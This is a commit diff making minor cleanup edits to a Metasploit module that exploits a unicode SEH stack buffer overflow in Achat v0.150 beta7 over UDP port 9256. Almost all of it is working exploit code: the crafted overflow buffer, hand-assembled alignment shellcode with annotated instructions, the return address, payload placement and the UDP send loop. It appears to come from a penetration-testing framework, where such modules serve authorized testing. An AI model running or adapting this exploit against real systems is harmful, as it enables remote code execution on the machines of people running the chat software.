Do minor cleanup
parent
ac6879cfe1
commit
86f3bcad11
|
@ -15,17 +15,16 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
super(update_info(info,
|
super(update_info(info,
|
||||||
'Name' => 'Achat v0.150 beta7 Buffer Overflow',
|
'Name' => 'Achat v0.150 beta7 Buffer Overflow',
|
||||||
'Description' => %q{
|
'Description' => %q{
|
||||||
This module exploits a SEH based unicode stack buffer overflow in Achat v0.150,
|
This module exploits an unicode SEH based stack buffer overflow in Achat v0.150. By
|
||||||
by sending a crafted message to the default harcoded port 9256. The message
|
sending a crafted message to the default port 9256 it's possible to overwrites the
|
||||||
overflows the stack and overwrites the SEH handler. The exploit is reliable, but
|
SEH handler. Even when the exploit is reliable it depends of timing since there are
|
||||||
depends of timing. It has two distinct threads that are overflowing the stack in
|
two threads overflowing the stack in the same time. This module has been tested on
|
||||||
the same time. Tested on Windows XP SP3 and Windows 7.
|
Windows XP SP3 and Windows 7.
|
||||||
The overflow was found by Peter Kasza.
|
|
||||||
},
|
},
|
||||||
'Author' =>
|
'Author' =>
|
||||||
[
|
[
|
||||||
'Balazs Bucsay <balazs.bucsay[-at-]rycon[-dot-]hu>', # Exploit, Metasploit module
|
'Peter Kasza <peter.kasza[at]itinsight.hu>', # Vulnerability discovery
|
||||||
'Peter Kasza <peter.kasza[-at-]itinsight[-dot-]hu>' # Vulnerability discovery
|
'Balazs Bucsay <balazs.bucsay[at]rycon.hu>' # Exploit, Metasploit module
|
||||||
],
|
],
|
||||||
'License' => MSF_LICENSE,
|
'License' => MSF_LICENSE,
|
||||||
'References' =>
|
'References' =>
|
||||||
|
@ -45,16 +44,15 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
'EncoderType' => Msf::Encoder::Type::AlphanumUnicodeMixed,
|
'EncoderType' => Msf::Encoder::Type::AlphanumUnicodeMixed,
|
||||||
'EncoderOptions' =>
|
'EncoderOptions' =>
|
||||||
{
|
{
|
||||||
'BufferRegister' => 'EAX',
|
'BufferRegister' => 'EAX'
|
||||||
}
|
}
|
||||||
|
|
||||||
},
|
},
|
||||||
'Platform' => 'win',
|
'Platform' => 'win',
|
||||||
'Targets' =>
|
'Targets' =>
|
||||||
[
|
[
|
||||||
# Tested OK Windows XP SP3, Windows 7
|
# Tested OK Windows XP SP3, Windows 7
|
||||||
# Not working on Windows Server 2003
|
# Not working on Windows Server 2003
|
||||||
[ 'Achat beta v0.150 / Windows XP SP3 / Windows 7 SP1', { 'Ret' => "\x2A\x46" } ], #AChat.exe
|
[ 'Achat beta v0.150 / Windows XP SP3 / Windows 7 SP1', { 'Ret' => "\x2A\x46" } ] #ppr from AChat.exe
|
||||||
],
|
],
|
||||||
'Privileged' => false,
|
'Privileged' => false,
|
||||||
'DefaultTarget' => 0,
|
'DefaultTarget' => 0,
|
||||||
|
@ -62,7 +60,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
|
|
||||||
register_options(
|
register_options(
|
||||||
[
|
[
|
||||||
Opt::RPORT(9256),
|
Opt::RPORT(9256)
|
||||||
], self.class)
|
], self.class)
|
||||||
end
|
end
|
||||||
|
|
||||||
|
@ -85,20 +83,20 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
# 0043 00 ADD BYTE PTR DS:[EBX],AL # padding
|
# 0043 00 ADD BYTE PTR DS:[EBX],AL # padding
|
||||||
# 59 POP ECX # padding
|
# 59 POP ECX # padding
|
||||||
# 0039 ADD BYTE PTR DS:[ECX],BH # padding
|
# 0039 ADD BYTE PTR DS:[ECX],BH # padding
|
||||||
firststage = "\x55\x2A\x55\x6E\x58\x6E\x05\x14\x11\x6E\x2D\x13\x11\x6E\x50\x6E\x58\x43\x59\x39"
|
first_stage = "\x55\x2A\x55\x6E\x58\x6E\x05\x14\x11\x6E\x2D\x13\x11\x6E\x50\x6E\x58\x43\x59\x39"
|
||||||
|
|
||||||
sploit = "A0000000002#Main" + "\x00" + "Z"*114688 + "\x00" + "A"*10 + "\x00"
|
sploit = 'A0000000002#Main' + "\x00" + 'Z' * 114688 + "\x00" + "A" * 10 + "\x00"
|
||||||
sploit << "A0000000002#Main" + "\x00" + "A"*57288 + "AAAAASI"*50 + "A"*(3750-46)
|
sploit << 'A0000000002#Main' + "\x00" + 'A' * 57288 + 'AAAAASI' * 50 + 'A' * (3750 - 46)
|
||||||
sploit << "\x62" + "A"*45 # 0x62 will be used to calculate the right offset
|
sploit << "\x62" + 'A' * 45 # 0x62 will be used to calculate the right offset
|
||||||
sploit << "\x61\x40" # POPAD + INC EAX
|
sploit << "\x61\x40" # POPAD + INC EAX
|
||||||
|
|
||||||
sploit << target.ret # AChat.exe p/p/r address
|
sploit << target.ret # AChat.exe p/p/r address
|
||||||
|
|
||||||
# adjusting the first thread's unicode payload, tricky asm-fu
|
# adjusting the first thread's unicode payload, tricky asm-fu
|
||||||
# the first seh exception jumps here, firststage variable will be executed
|
# the first seh exception jumps here, first_stage variable will be executed
|
||||||
# by the second seh exception as well. It needs to be in sync with the second
|
# by the second seh exception as well. It needs to be in sync with the second
|
||||||
# thread, so that is why we adjust eax/ebp to have a close pointer to the
|
# thread, so that is why we adjust eax/ebp to have a close pointer to the
|
||||||
# payload, then firststage variable will take the rest of the job.
|
# payload, then first_stage variable will take the rest of the job.
|
||||||
# 0043 00 ADD BYTE PTR DS:[EBX],AL # padding
|
# 0043 00 ADD BYTE PTR DS:[EBX],AL # padding
|
||||||
# 55 PUSH EBP # ebp with close pointer to payload
|
# 55 PUSH EBP # ebp with close pointer to payload
|
||||||
# 006E 00 ADD BYTE PTR DS:[ESI],CH # padding
|
# 006E 00 ADD BYTE PTR DS:[ESI],CH # padding
|
||||||
|
@ -113,22 +111,20 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
# 50 PUSH EAX # saving eax
|
# 50 PUSH EAX # saving eax
|
||||||
# 0043 00 ADD BYTE PTR DS:[EBX],AL # padding
|
# 0043 00 ADD BYTE PTR DS:[EBX],AL # padding
|
||||||
# 5D POP EBP # mov ebp, eax
|
# 5D POP EBP # mov ebp, eax
|
||||||
sploit << "\x43\x55\x6E\x58\x6E\x2A\x2A\x05\x14\x11\x43\x2d\x13\x11\x43\x50\x43\x5D" + "C"*9 + "\x60\x43"
|
sploit << "\x43\x55\x6E\x58\x6E\x2A\x2A\x05\x14\x11\x43\x2d\x13\x11\x43\x50\x43\x5D" + 'C' * 9 + "\x60\x43"
|
||||||
sploit << "\x61\x43" + target.ret # second nseh entry, for the second thread
|
sploit << "\x61\x43" + target.ret # second nseh entry, for the second thread
|
||||||
sploit << "\x2A" + firststage + "C"*(157-firststage.length-31-3) # put address of the payload to EAX
|
sploit << "\x2A" + first_stage + 'C' * (157 - first_stage.length - 31 -3) # put address of the payload to EAX
|
||||||
sploit << payload.encoded + "A"*(1152-payload.encoded.length) # placing the payload
|
sploit << payload.encoded + 'A' * (1152 - payload.encoded.length) # placing the payload
|
||||||
sploit << "\x00" + "A"*10 + "\x00"
|
sploit << "\x00" + 'A' * 10 + "\x00"
|
||||||
|
|
||||||
|
|
||||||
i = 0
|
i = 0
|
||||||
while i < sploit.length do
|
while i < sploit.length do
|
||||||
if i > 172000
|
if i > 172000
|
||||||
Rex::sleep(1.0)
|
Rex::sleep(1.0)
|
||||||
end
|
end
|
||||||
udp_sock.put(sploit[i..i+8192-1])
|
sent = udp_sock.put(sploit[i..i + 8192 - 1])
|
||||||
i += 8192
|
i += sent
|
||||||
end
|
end
|
||||||
|
|
||||||
disconnect_udp
|
disconnect_udp
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
Loading…
Reference in New Issue